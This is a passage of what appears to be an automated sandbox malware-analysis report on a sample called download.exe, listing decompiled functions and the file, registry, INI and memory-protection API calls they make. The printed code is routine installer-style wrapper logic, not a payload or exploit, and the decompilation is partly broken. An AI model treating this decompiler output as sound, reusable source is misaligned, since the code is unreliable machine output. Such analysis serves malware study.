                                                        • Part of subcall function 004062A7: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040630B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00405B16(CHAR* _a4, long _a8, long _a12) {
                                                      				signed int _t5;
                                                      				void* _t6;
                                                      
                                                      				_t5 = GetFileAttributesA(_a4); // executed
                                                      				asm("sbb ecx, ecx");
                                                      				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                      				return _t6;
                                                      			}






                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405B1A
                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B3C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405AF1(CHAR* _a4) {
                                                      				signed char _t3;
                                                      				signed char _t7;
                                                      
                                                      				_t3 = GetFileAttributesA(_a4); // executed
                                                      				_t7 = _t3;
                                                      				if(_t7 != 0xffffffff) {
                                                      					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                      				}
                                                      				return _t7;
                                                      			}






                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(?,?,00405709,?,?,00000000,004058EC,?,?,?,?), ref: 00405AF6
                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B0A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004055E7(CHAR* _a4) {
                                                      				int _t2;
                                                      
                                                      				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                      				if(_t2 == 0) {
                                                      					return GetLastError();
                                                      				}
                                                      				return 0;
                                                      			}





                                                      APIs
                                                      • CreateDirectoryA.KERNELBASE(?,00000000,004031DC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 004055ED
                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055FB
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E706B29F8(void* __ecx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				void* _t28;
                                                      				void* _t29;
                                                      				int _t33;
                                                      				void* _t37;
                                                      				void* _t40;
                                                      				void* _t45;
                                                      				void* _t49;
                                                      				signed int _t56;
                                                      				void* _t61;
                                                      				void* _t70;
                                                      				intOrPtr _t72;
                                                      				signed int _t77;
                                                      				intOrPtr _t79;
                                                      				intOrPtr _t80;
                                                      				void* _t81;
                                                      				void* _t87;
                                                      				void* _t88;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				intOrPtr _t93;
                                                      				intOrPtr _t94;
                                                      
                                                      				if( *0x706b4040 != 0 && E706B293D(_a4) == 0) {
                                                      					 *0x706b4044 = _t93;
                                                      					if( *0x706b403c != 0) {
                                                      						_t93 =  *0x706b403c;
                                                      					} else {
                                                      						E706B2F20(E706B2937(), __ecx);
                                                      						 *0x706b403c = _t93;
                                                      					}
                                                      				}
                                                      				_t28 = E706B296B(_a4);
                                                      				_t94 = _t93 + 4;
                                                      				if(_t28 <= 0) {
                                                      					L9:
                                                      					_t29 = E706B295F();
                                                      					_t72 = _a4;
                                                      					_t79 =  *0x706b4048;
                                                      					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                      					 *0x706b4048 = _t72;
                                                      					E706B2959();
                                                      					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
                                                      					 *0x706b401c = _t33;
                                                      					 *0x706b4020 = _t79;
                                                      					if( *0x706b4040 != 0 && E706B293D( *0x706b4048) == 0) {
                                                      						 *0x706b403c = _t94;
                                                      						_t94 =  *0x706b4044;
                                                      					}
                                                      					_t80 =  *0x706b4048;
                                                      					_a4 = _t80;
                                                      					 *0x706b4048 =  *((intOrPtr*)(E706B295F() + _t80));
                                                      					_t37 = E706B294B(_t80);
                                                      					_pop(_t81);
                                                      					if(_t37 != 0) {
                                                      						_t40 = E706B296B(_t81);
                                                      						if(_t40 > 0) {
                                                      							_push(_t40);
                                                      							_push(E706B2976() + _a4 + _v8);
                                                      							_push(E706B2980());
                                                      							if( *0x706b4040 <= 0 || E706B293D(_a4) != 0) {
                                                      								_pop(_t88);
                                                      								_pop(_t45);
                                                      								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                      								if(__eflags == 0) {
                                                      								}
                                                      								asm("loop 0xfffffff5");
                                                      							} else {
                                                      								_pop(_t89);
                                                      								_pop(_t49);
                                                      								 *0x706b403c =  *0x706b403c +  *(_t89 + _t49) * 4;
                                                      								asm("loop 0xffffffeb");
                                                      							}
                                                      						}
                                                      					}
                                                      					_t107 =  *0x706b4048;
                                                      					if( *0x706b4048 == 0) {
                                                      						 *0x706b403c = 0;
                                                      					}
                                                      					E706B29A4(_t107, _a4,  *0x706b401c,  *0x706b4020);
                                                      					return _a4;
                                                      				}
                                                      				_push(E706B2976() + _a4);
                                                      				_t56 = E706B297C();
                                                      				_v8 = _t56;
                                                      				_t77 = _t28;
                                                      				_push(_t68 + _t56 * _t77);
                                                      				_t70 = E706B2988();
                                                      				_t87 = E706B2984();
                                                      				_t90 = E706B2980();
                                                      				_t61 = _t77;
                                                      				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                      					_push( *((intOrPtr*)(_t70 + _t61)));
                                                      				}
                                                      				_push( *((intOrPtr*)(_t87 + _t61)));
                                                      				asm("loop 0xfffffff1");
                                                      				goto L9;
                                                       			}

                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000), ref: 706B2AB7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                       • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 729d42de8215ce22247c9b85d125401b20cf848540882f3ce6aab04380f8fcc6
                                                      • Instruction ID: dbaec91265b3bb9adb87f556c7a4a1df20dc7d0dda32c2a02adc0dfc3a783c5a
                                                      • Opcode Fuzzy Hash: 729d42de8215ce22247c9b85d125401b20cf848540882f3ce6aab04380f8fcc6
                                                      • Instruction Fuzzy Hash: B04191F3904246DFDB21BFA6DCB5B9D77F6EB04354F308629E609C61A0C67CA8418B94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004025CA(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t33;
                                                      				void* _t38;
                                                      				void* _t41;
                                                      
                                                      				_t33 = __edx;
                                                      				 *((intOrPtr*)(_t38 - 8)) = __ebx;
                                                      				_t27 = E00402AA9(2);
                                                      				_t41 = _t27 - 1;
                                                      				 *((intOrPtr*)(_t38 - 0x3c)) = _t33;
                                                      				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
                                                      				if(_t41 < 0) {
                                                      					L24:
                                                      					 *0x7a2fe8 =  *0x7a2fe8 +  *(_t38 - 4);
                                                      				} else {
                                                      					__ecx = 0x3ff;
                                                      					if(__eax > 0x3ff) {
                                                      						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
                                                      					}
                                                      					if( *__esi == __bl) {
                                                      						L21:
                                                      						__esi =  *((intOrPtr*)(__ebp - 8));
                                                      						goto L22;
                                                      					} else {
                                                      						 *((char*)(__ebp + 0xb)) = __bl;
                                                      						 *(__ebp - 0x30) = E00405EF4(__ecx, __esi);
                                                      						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
                                                      							goto L21;
                                                      						} else {
                                                      							__esi =  *((intOrPtr*)(__ebp - 8));
                                                      							while(1) {
                                                      								__eax = __ebp - 0xd;
                                                      								__eax = E00405B8E( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
                                                      								if(__eax == 0) {
                                                      									break;
                                                      								}
                                                      								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                      									 *(__ebp - 0xd) & 0x000000ff = E00405EDB(__edi,  *(__ebp - 0xd) & 0x000000ff);
                                                      								} else {
                                                      									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                                      										__al =  *(__ebp - 0xd);
                                                      										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                                      											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
                                                      										} else {
                                                      											 *((char*)(__esi + __edi)) = __al;
                                                      											__esi = __esi + 1;
                                                      										}
                                                      										break;
                                                      									} else {
                                                      										__al =  *(__ebp - 0xd);
                                                      										 *((char*)(__esi + __edi)) = __al;
                                                      										__esi = __esi + 1;
                                                      										 *((char*)(__ebp + 0xb)) = __al;
                                                      										if(__al == __bl) {
                                                      											break;
                                                      										} else {
                                                      											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
                                                      												continue;
                                                      											} else {
                                                      												break;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L25;
                                                      							}
                                                      							L22:
                                                      							 *((char*)(__esi + __edi)) = __bl;
                                                      							if(_t41 == 0) {
                                                      								 *(_t38 - 4) = 1;
                                                      							}
                                                      							goto L24;
                                                      						}
                                                      					}
                                                      				}
                                                      				L25:
                                                      				return 0;
                                                       			}

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: wsprintf
                                                      • String ID:
                                                      • API String ID: 2111968516-0
                                                      • Opcode ID: 255e133b5fdcbc2f7a9ca64d0d55690020652cb371cb3a25a4775619f9253d8f
                                                      • Instruction ID: c2a1b850aa9b93e4cbc4820df7219add1c6eba77a771e25ce3fc61ee94bd300f
                                                      • Opcode Fuzzy Hash: 255e133b5fdcbc2f7a9ca64d0d55690020652cb371cb3a25a4775619f9253d8f
                                                      • Instruction Fuzzy Hash: C121E770C04299BADF218BA99548AAEBF749F11314F1448BFE490B62D1C6BD8A81CF19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E0040166A() {
                                                      				int _t7;
                                                      				void* _t13;
                                                      				void* _t15;
                                                      				void* _t20;
                                                      
                                                      				_t18 = E00402ACB(0xffffffd0);
                                                      				_t16 = E00402ACB(0xffffffdf);
                                                      				E00402ACB(0x13);
                                                      				_t7 = MoveFileA(_t4, _t5); // executed
                                                      				if(_t7 == 0) {
                                                      					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406280(_t18) == 0) {
                                                      						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                      					} else {
                                                      						E00405D5C(_t15, _t18, _t16);
                                                      						_push(0xffffffe4);
                                                      						goto L5;
                                                      					}
                                                      				} else {
                                                      					_push(0xffffffe3);
                                                      					L5:
                                                      					E00401423();
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t20 - 4));
                                                      				return 0;
                                                      			}








                                                      APIs
                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileMove
                                                      • String ID:
                                                      • API String ID: 3562171763-0
                                                      • Opcode ID: ffb8758106d718844b4ca8497fa130c870188eea5682979d4ef787b9ceac6626
                                                      • Instruction ID: 2d7bf1c298bed6491edf678891ac3a09e03c979460778333709229851ac33c08
                                                      • Opcode Fuzzy Hash: ffb8758106d718844b4ca8497fa130c870188eea5682979d4ef787b9ceac6626
                                                      • Instruction Fuzzy Hash: 77F09031704221A7CB20B6A94F5DD9F56648F8236CB244A3FF111B21E2DABD8902867F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 40%
                                                      			E00402688(intOrPtr __edx, void* __eflags) {
                                                      				long _t7;
                                                      				long _t9;
                                                      				LONG* _t11;
                                                      				void* _t13;
                                                      				intOrPtr _t14;
                                                      				void* _t17;
                                                      				void* _t19;
                                                      
                                                      				_t14 = __edx;
                                                      				_push(ds);
                                                      				if(__eflags != 0) {
                                                      					_t7 = E00402AA9(2);
                                                      					_pop(_t13);
                                                      					 *((intOrPtr*)(_t19 - 0x3c)) = _t14;
                                                      					_t9 = SetFilePointer(E00405EF4(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
                                                      					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
                                                      						_push(_t9);
                                                      						E00405EDB();
                                                      					}
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t19 - 4));
                                                      				return 0;
                                                      			}











                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A6
                                                        • Part of subcall function 00405EDB: wsprintfA.USER32 ref: 00405EE8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FilePointerwsprintf
                                                      • String ID:
                                                      • API String ID: 327478801-0
                                                      • Opcode ID: 8303a16c8324cd1585bb4d8f8fd59fc2d4d610d9dc2ffc373cffb4fce9594ffb
                                                      • Instruction ID: 110f2c4880f6573f93162833435315c6132d41cf51db6092c043686707d14882
                                                      • Opcode Fuzzy Hash: 8303a16c8324cd1585bb4d8f8fd59fc2d4d610d9dc2ffc373cffb4fce9594ffb
                                                      • Instruction Fuzzy Hash: 39E0EDB2B00116AADB01EBD5AA49CBFB768DF40318B10403BF141B50D1CA7D4A029B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004022FC(int __eax, CHAR* __ebx) {
                                                      				CHAR* _t11;
                                                      				void* _t13;
                                                      				CHAR* _t14;
                                                      				void* _t18;
                                                      				int _t22;
                                                      
                                                      				_t11 = __ebx;
                                                      				_t5 = __eax;
                                                      				_t14 = 0;
                                                      				if(__eax != __ebx) {
                                                      					__eax = E00402ACB(__ebx);
                                                      				}
                                                      				if(_t13 != _t11) {
                                                      					_t14 = E00402ACB(0x11);
                                                      				}
                                                      				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
                                                      					_t11 = E00402ACB(0x22);
                                                      				}
                                                      				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402ACB(0xffffffcd)); // executed
                                                      				_t22 = _t5;
                                                      				if(_t22 == 0) {
                                                      					 *((intOrPtr*)(_t18 - 4)) = 1;
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t18 - 4));
                                                      				return 0;
                                                      			}









                                                      APIs
                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: a35f8e91713f0605e290066fe2cc807c403f3e4948e2e514c4de22b42c68f79f
                                                      • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                                                      • Opcode Fuzzy Hash: a35f8e91713f0605e290066fe2cc807c403f3e4948e2e514c4de22b42c68f79f
                                                      • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040171F() {
                                                      				long _t5;
                                                      				CHAR* _t8;
                                                      				CHAR* _t12;
                                                      				void* _t14;
                                                      				long _t17;
                                                      
                                                      				_t5 = SearchPathA(_t8, E00402ACB(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                      				_t17 = _t5;
                                                      				if(_t17 == 0) {
                                                      					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                      					 *_t12 = _t8;
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t14 - 4));
                                                      				return 0;
                                                      			}









                                                      APIs
                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: PathSearch
                                                      • String ID:
                                                      • API String ID: 2203818243-0
                                                      • Opcode ID: ec3f6c22f74dbc9dc9b5470527ecbb0f659c4474b53f7c7e74f6d3e7950ec302
                                                      • Instruction ID: a921dc9e30d1d81fe6b9094ed5ee79d2c80462cb6aa05ca6df5bdeca8f1c6b24
                                                      • Opcode Fuzzy Hash: ec3f6c22f74dbc9dc9b5470527ecbb0f659c4474b53f7c7e74f6d3e7950ec302
                                                      • Instruction Fuzzy Hash: 68E0D8B1300141ABDB00DBA89D49EAA7B58DB40368F20853AE111A60C2D2B949419728
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405E31(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                      				void* _t7;
                                                      				long _t8;
                                                      				void* _t9;
                                                      
                                                      				_t7 = E00405D88(_a4,  &_a12);
                                                      				if(_t7 != 0) {
                                                      					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                      					return _t8;
                                                      				}
                                                      				_t9 = 6;
                                                      				return _t9;
                                                      			}







                                                      APIs
                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E5A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                      • Instruction ID: 33ca04e46434342caff68362b3d2cda83283301915701ba1f7808c3e8cd8b3f6
                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                      • Instruction Fuzzy Hash: F9E0ECB211050DBEEF195F90DD0ADBB3B1DEB04344F50492EFA46E4090E6B5EA20AE78
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405B8E(void* _a4, void* _a8, long _a12) {
                                                      				int _t7;
                                                      				long _t11;
                                                      
                                                      				_t11 = _a12;
                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                      					return 0;
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}






                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040319E,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BA2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                      • Instruction ID: a6de1eac7d35dbb408d2fa80093daaad73b751b804ef2b379125a3e319db5d80
                                                      • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                      • Instruction Fuzzy Hash: 46E0EC3221565AABEF119E559C00AEB7B6CEB05360F004476FD15E3190D6B1FA219BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405BBD(void* _a4, void* _a8, long _a12) {
                                                      				int _t7;
                                                      				long _t11;
                                                      
                                                      				_t11 = _a12;
                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                      					return 0;
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}






                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403154,00000000,0078A0F8,000000FF,0078A0F8,000000FF,000000FF,00000004,00000000), ref: 00405BD1
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                      • Instruction ID: b26364db078b9021274dcd752d930f9f8b31cc58193ee345d62fa94dbd0509c3
                                                      • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                      • Instruction Fuzzy Hash: 2EE0EC3221865AABDF609E559C00AEB7B7CEB05364F044437F925EA190D631F821DBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                      
                                                      				 *0x706b4038 = _a4;
                                                      				if(_a8 == 1) {
                                                      					VirtualProtect(0x706b404c, 4, 0x40, 0x706b403c); // executed
                                                      					 *0x706b404c = 0xc2;
                                                      					 *0x706b403c = 0;
                                                      					 *0x706b4044 = 0;
                                                      					 *0x706b4058 = 0;
                                                      					 *0x706b4048 = 0;
                                                      					 *0x706b4040 = 0;
                                                      					 *0x706b4050 = 0;
                                                      					 *0x706b404e = 0;
                                                      				}
                                                      				return 1;
                                                      			}




                                                      APIs
                                                      • VirtualProtect.KERNELBASE(706B404C,00000004,00000040,706B403C), ref: 706B28FF
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 8632835d39996d20ae29b24d71643f54fb0789fd4f1c3abb76f25be8f8b20f62
                                                      • Instruction ID: 9e508f8297a71ebe6f3dd2c49ff77368f65e86a31a97a159256825e3b7ec72a0
                                                      • Opcode Fuzzy Hash: 8632835d39996d20ae29b24d71643f54fb0789fd4f1c3abb76f25be8f8b20f62
                                                      • Instruction Fuzzy Hash: 5EF028F3508291DEC760EF6A8CA8B053EF1A729295B32476AE75CD62A1E3B854448B11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402340(char __ebx) {
                                                      				char _t7;
                                                      				CHAR* _t8;
                                                      				CHAR* _t19;
                                                      				void* _t21;
                                                      				void* _t24;
                                                      
                                                      				_t7 =  *0x40a010; // 0xa
                                                      				 *(_t21 + 0xa) = _t7;
                                                      				_t8 = E00402ACB(1);
                                                      				 *(_t21 - 0x3c) = E00402ACB(0x12);
                                                      				GetPrivateProfileStringA(_t8,  *(_t21 - 0x3c), _t21 + 0xa, _t19, 0x3ff, E00402ACB(0xffffffdd)); // executed
                                                      				_t24 =  *_t19 - 0xa;
                                                      				if(_t24 == 0) {
                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                      					 *_t19 = __ebx;
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t21 - 4));
                                                      				return 0;
                                                      			}









                                                      APIs
                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: e634efb2739fac2aca00153e77e0a6ce01b8612d3462cd0d1e8aa1f1549dbd2c
                                                      • Instruction ID: 8e029bd2b2674609338b614665d9252e3eb93026fbeeab8b0acd3e0b98e79a96
                                                      • Opcode Fuzzy Hash: e634efb2739fac2aca00153e77e0a6ce01b8612d3462cd0d1e8aa1f1549dbd2c
                                                      • Instruction Fuzzy Hash: 2EE0803090430479DB10AFA18E0AEAD35649F41714F144839F5507B0D1EEB544419B3D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405E03(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                      				void* _t7;
                                                      				long _t8;
                                                      				void* _t9;
                                                      
                                                      				_t7 = E00405D88(_a4,  &_a12);
                                                      				if(_t7 != 0) {
                                                      					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
                                                      					return _t8;
                                                      				}
                                                      				_t9 = 6;
                                                      				return _t9;
                                                      			}







                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E91,?,?,?,?,00000002,Call), ref: 00405E27
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                      • Instruction ID: 2a8135548ed97db7cee66e6f72713ae5fed4585321cbc755a00175e49ece29d7
